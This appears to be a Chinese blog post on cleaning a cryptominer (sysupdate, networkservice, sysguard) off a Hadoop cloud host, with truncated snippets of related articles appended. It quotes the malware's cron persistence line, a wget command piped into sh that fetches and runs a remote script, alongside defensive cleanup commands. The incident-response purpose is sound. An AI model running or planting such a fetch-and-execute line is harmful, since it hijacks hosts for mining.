一、記錄j總雲主機被挖礦
1、top命令檢視資源佔用率
2、ps -ef | grep ***x 檢視該程序
how to solve?
1、crontab -l; 檢視當前使用者的定時任務
2、crontab -e; 輸入i,變成insert模式,在內容前加 「#」,把內容注釋掉,然後wq儲存退出。
挖礦**:wget -q -o - | sh > /dev/null 2>&1同時把wget包解除安裝掉,yum remove wget
1、使用top命令檢視:
2、使用top已經知道了程序號,接下來看看位置,命令ls -l proc//exe
[hadoop@hadoop hadoop-2.6.0-cdh5.7.0]$ ls -l /proc/8062/exe
lrwxrwxrwx 1 hadoop hadoop 0 oct 17 14:31 /proc/8062/exe -> /tmp/sysupdate
[hadoop@hadoop hadoop-2.6.0-cdh5.7.0]$ ls -l /proc/8114/exe
lrwxrwxrwx 1 hadoop hadoop 0 oct 17 14:31 /proc/8114/exe -> /tmp/networkservice
到/tmp目錄下,除了sysupdate、networkservice 同時還有sysguard、update.sh,除了update.sh其餘的都是二進位制檔案,應該就是挖礦的主程式以及守護程式了。
提取碼:s06o
解決:
rm /var/spool/cron/root 或crontab -r1、殺掉程序:
[hadoop@hadoop hadoop-2.6.0-cdh5.7.0]$ kill -9 8062
[hadoop@hadoop hadoop-2.6.0-cdh5.7.0]$ kill -9 8114
2、刪除/tmp目錄下的檔案:
[root@hadoop tmp]
# rm -rf kow656kd networkservice sora.x86 sysguard sysupdate sysupdates update.sh
雲主機被挖礦病毒感染的處理過程
舍友在宿舍喊著,我的這個雲主機好卡啊,難受啊!我讓他用top命令看一下cpu占用。一看嚇一跳,乙個叫做sysupdate的程序佔據了絕大部分的cpu資源。cpu使用率接近100 看來肯定是被當礦機了。然後就是新增定時任務,為檔案新增chattr i,修改iptables,清楚日誌,關閉selinux...
阿里雲被挖礦程序wnTKYg入侵的解決方法
殺wntkyg病毒分兩步,第一是找到它的 切斷入口,第二步,找到它的守護程序並殺死,然後再去殺死病毒程序,有的守護程序很隱蔽,喚醒病毒之後,自動消亡,這時候top就看不到了,要留心。最近專案在做效能測試,發現cpu使用率異常,無人訪問時cpu也一直保持75 然後在xshell上top了一下,發現wn...
阿里雲伺服器被挖礦minerd入侵的解決辦法
hu wen遇到的和我最相似,下邊是他的解決辦法 但我去檢視啟動的服務,盡然沒有 lady 這個服務。找不到始作俑者,那個minerd程序刪掉就又起來了,後來想了個臨時辦法,先停掉了挖礦的程序 1.關閉訪問挖礦伺服器的訪問iptables a input s xmr.crypto pool.fr j...